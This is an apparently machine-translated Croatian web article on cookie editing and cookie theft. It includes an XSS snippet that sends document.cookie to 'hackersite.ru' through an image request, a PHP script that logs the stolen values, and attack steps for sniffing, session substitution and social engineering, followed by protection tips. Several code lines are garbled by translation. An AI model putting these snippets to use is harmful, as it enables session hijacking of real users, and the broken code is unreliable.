Kako promijeniti ili zamijeniti kolačiće?

Programeri preglednika ne daju ugrađene alate za uređivanje kolačića. Ali možete se snaći s običnom bilježnicom.


Korak 1: stvorite tekstualnu datoteku s tekstom

Windows Registry Editor verzija 5.00



@="C:\\IE_ext.htm"

Spremite ga pod imenom IE_ext.reg

Korak 2: Koristeći stvorenu datoteku, dodajte promjene u Windows registar.

Korak 3: kreirajte tekstualnu datoteku s tekstom

< script jezik="javascript">
external.menuArguments.clipboardData.setData("Tekst" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
upozorenje(vanjski.izbornikArgumenti.dokument.kolačić);


Spremite ga pod imenom C:\IE_ext.htm

Korak 4: Idemo na web stranicu koja nas zanima.

Korak 5: Desnom tipkom miša kliknite prazan prostor na stranici i odaberite stavku izbornika "Rad s kolačićima". Dopusti pristup međuspremniku. Vaši kolačići s ove stranice otići će u međuspremnik. Možete ubaciti njihov notes i pogledati.


Korak 6: Za promjenu nekih kolačića uredite datoteku C:\IE_ext.htm, zamjenjujući testno ime u ime kolačića, testna vrijednost- o njegovom značenju, testdomain.ru– na domenu stranice. Ako je potrebno, dodajte još sličnih redaka. Radi lakše kontrole, dodao sam u skriptu izlaz trenutnih kolačića prije i poslije promjene: upozorenje(vanjski.izbornikArgumenti.dokument.kolačić);

Korak 7: Ponovno izvedite korak 5, a zatim osvježite stranicu.

Zaključak: pristupit ćemo ovom internetskom izvoru s ažuriranim kolačićima.

Kako ukrasti kolačiće pomoću JavaScripta?

Ako napadač uspije pronaći priliku za izvršavanje proizvoljne JavaScript skripte na žrtvinom računalu, tada može vrlo lako pročitati trenutne kolačiće. Primjer:


var str= document.cookie;

Ali hoće li ih moći prenijeti na svoje web mjesto jer, kao što sam ranije naznačio, JavaScript skripta neće moći pristupiti web mjestu koje se nalazi na drugoj domeni bez dodatne potvrde? Ispada da JavaScript skripta može učitati bilo koju sliku koja se nalazi na bilo kojem http poslužitelju. U isto vrijeme prenesite sve tekstualne informacije u zahtjevu za preuzimanje na ovu sliku. Primjer: http://hackersite.ru/xss.jpg?text_info Dakle, ako pokrenete ovaj kod:

prom. img= nova slika();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokument.kolačić);


tada će kolačić završiti u zahtjevu za preuzimanje "slike" i "otići" do napadača.

Kako postupati s takvim zahtjevima za preuzimanje "slike"?

Napadač samo treba pronaći hosting s PHP podrškom i tamo postaviti kod poput ovog:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Tada će svi parametri zahtjeva za ovu skriptu biti spremljeni u datoteku log.txt. Preostaje samo zamijeniti prethodno opisanu JavaScript skriptu http://hackersite.ru/xss.jpg na stazu do ove php skripte.


Poanta

Pokazao sam samo najjednostavniji način za iskorištavanje XSS ranjivosti. Ali ovo dokazuje da prisutnost barem jedne takve ranjivosti na višekorisničkom internetskom mjestu može omogućiti napadaču da koristi njegove resurse u vaše ime.

Kolačići - informacije u obliku tekstualne datoteke koju web stranica sprema na računalo korisnika. Sadrži podatke za autentifikaciju (prijava/lozinka, ID, telefonski broj, adresa poštanskog sandučića), korisničke postavke, status pristupa. Pohranjeno u profilu preglednika.

Hakiranje kolačića je krađa (ili "otimanje") sesije posjetitelja web izvora. Privatne informacije postaju dostupne ne samo pošiljatelju i primatelju, već i trećoj strani - osobi koja je izvršila presretanje.

Alati i tehnike za hakiranje kolačića

Kradljivci računala, kao i njihovi kolege u stvarnom životu, osim vještina, spretnosti i znanja, naravno, imaju i svoj alat - svojevrsni arsenal majstorskih ključeva i sondi. Pogledajmo najpopularnije trikove kojima hakeri izvlače kolačiće od korisnika interneta.

Njuškala

Posebni programi za praćenje i analizu mrežnog prometa. Ime im dolazi od engleskog glagola “sniff” (njuškati), jer. doslovno "njušiti" poslane pakete između čvorova.

Ali napadači koriste njuškalo za presretanje podataka sesije, poruka i drugih povjerljivih informacija. Mete njihovih napada su uglavnom nezaštićene mreže, gdje se kolačići šalju u otvorenoj HTTP sesiji, odnosno praktički nisu kriptirani. (Javni Wi-Fi je najranjiviji u tom smislu.)

Za ugradnju sniffera u internetski kanal između korisničkog čvora i web poslužitelja koriste se sljedeće metode:

  • “slušanje” mrežnih sučelja (hubova, preklopnika);
  • grananje i kopiranje prometa;
  • spajanje na jaz mrežnog kanala;
  • analiza putem posebnih napada koji preusmjeravaju promet žrtve na njuškalo (MAC-spoofing, IP-spoofing).

Kratica XSS je kratica za Cross Site Scripting. Koristi se za napad na web stranice kako bi se ukrali korisnički podaci.

Princip XSS-a je sljedeći:

  • napadač ubacuje zlonamjerni kod (posebnu prikrivenu skriptu) na web stranicu web stranice, forum ili u poruku (primjerice, prilikom dopisivanja na društvenoj mreži);
  • žrtva odlazi na zaraženu stranicu i aktivira instalirani kod na svom računalu (klikne, slijedi poveznicu itd.);
  • zauzvrat, izvršeni zlonamjerni kod "izvlači" korisnikove povjerljive podatke iz preglednika (osobito kolačiće) i šalje ih web poslužitelju napadača.

Kako bi "usadili" softverski XSS mehanizam, hakeri koriste sve vrste ranjivosti u web poslužiteljima, online uslugama i preglednicima.

Sve XSS ranjivosti dijele se u dvije vrste:

  • Pasivno. Napad se postiže traženjem određene skripte na web stranici. Zlonamjerni kôd može se ubaciti u različite oblike na web-stranici (na primjer, u traku za pretraživanje web-mjesta). Najosjetljiviji na pasivni XSS su resursi koji ne filtriraju HTML oznake kada podaci stignu;
  • Aktivan. Nalazi se izravno na poslužitelju. I aktiviraju se u pregledniku žrtve. Aktivno ih koriste prevaranti u svim vrstama blogova, chatova i feedova vijesti.

Hakeri pažljivo "kamufliraju" svoje XSS skripte kako žrtva ne bi ništa posumnjala. Mijenjaju ekstenziju datoteke, prenose kod kao sliku, motiviraju ih da slijede link i privlače ih zanimljivim sadržajem. Kao rezultat: korisnik osobnog računala, nesposoban kontrolirati vlastitu znatiželju, vlastitom rukom (klikom miša) šalje kolačiće sesije (s prijavom i lozinkom!) autoru XSS skripte - računalnom zlikovcu.

Zamjena kolačića

Svi se kolačići spremaju i šalju web poslužitelju (s kojeg su “došli”) bez ikakvih promjena – u izvornom obliku – s istim vrijednostima, nizovima i drugim podacima. Namjerna izmjena njihovih parametara naziva se zamjena kolačića. Drugim riječima, prilikom zamjene kolačića, napadač se pretvara da je pusta želja. Na primjer, prilikom plaćanja u online trgovini, kolačić mijenja iznos uplate prema dolje - tako dolazi do "štede" na kupnji.

Ukradeni kolačići sesije na društvenoj mreži s tuđeg računa "ubacuju se" u drugu sesiju i na drugo računalo. Vlasnik ukradenih kolačića dobiva puni pristup žrtvinom računu (prepiska, sadržaj, postavke stranice) sve dok je ona na svojoj stranici.

“Uređivanje” kolačića provodi se pomoću:

  • Funkcije “Upravljanje kolačićima...” u pregledniku Opera;
  • Dodaci za upravljanje kolačićima i napredni upravitelj kolačića za FireFox;
  • IECookiesView pomoćni programi (samo Internet Explorer);
  • uređivač teksta kao što je AkelPad, NotePad ili Windows Notepad.

Fizički pristup podacima

Vrlo jednostavna shema implementacije, koja se sastoji od nekoliko koraka. Ali djelotvorno je samo ako je žrtvino računalo s otvorenom sesijom, na primjer VKontakte, ostavljeno bez nadzora (i to dugo!):

  1. Funkcija javascripta unosi se u adresnu traku preglednika za prikaz svih spremljenih kolačića.
  2. Nakon pritiska na “ENTER” svi se pojavljuju na stranici.
  3. Kolačići se kopiraju, spremaju u datoteku, a zatim prenose na flash disk.
  4. Na drugom računalu kolačići se zamjenjuju u novoj sesiji.
  5. Pristup žrtvinom računu je odobren.

U pravilu, hakeri koriste gore navedene alate (+ druge) u kombinaciji (budući da je razina zaštite na mnogim web resursima prilično visoka) i zasebno (kada su korisnici pretjerano naivni).

XSS + njuškalo

  1. Kreira se XSS skripta koja navodi adresu mrežnog njuškala (bilo domaćeg ili specifične usluge).
  2. Zlonamjerni kod sprema se s ekstenzijom .img (format slike).
  3. Ta se datoteka potom učitava na web stranicu, chat ili osobnu poruku - gdje će se izvršiti napad.
  4. Pozornost korisnika skreće se na stvorenu “zamku” (tu na snagu stupa društveni inženjering).
  5. Ako se zamka aktivira, kolačiće iz žrtvinog preglednika presreće njuškalo.
  6. Napadač otvara zapise sniffera i dohvaća ukradene kolačiće.
  7. Zatim izvodi zamjenu kako bi dobio prava vlasnika računa pomoću gore navedenih alata.

Zaštita kolačića od hakiranja

  1. Koristite šifriranu vezu (koristeći odgovarajuće protokole i sigurnosne metode).
  2. Ne odgovarajte na sumnjive poveznice, slike ili primamljive ponude da se upoznate s “novim besplatnim softverom”. Pogotovo od stranaca.
  3. Koristite samo pouzdane web resurse.
  4. Završite autoriziranu sesiju klikom na gumb "Odjava" (ne samo zatvaranjem kartice!). Pogotovo ako ste se prijavili na svoj račun ne s osobnog računala, već, na primjer, s računala u internetskom kafiću.
  5. Nemojte koristiti značajku preglednika "Spremi lozinku". Pohranjeni registracijski podaci značajno povećavaju rizik od krađe. Ne budite lijeni, ne gubite nekoliko minuta vremena na unos lozinke i prijavu na početku svake sesije.
  6. Nakon surfanja webom - posjećivanja društvenih mreža, foruma, chatova, web stranica - izbrišite spremljene kolačiće i očistite predmemoriju preglednika.
  7. Redovito ažurirajte preglednike i antivirusni softver.
  8. Koristite proširenja preglednika koja štite od XSS napada (na primjer, NoScript za FF i Google Chrome).
  9. Povremeno na računima.

I što je najvažnije, ne gubite budnost i pozornost dok se opuštate ili radite na internetu!

reci prijateljima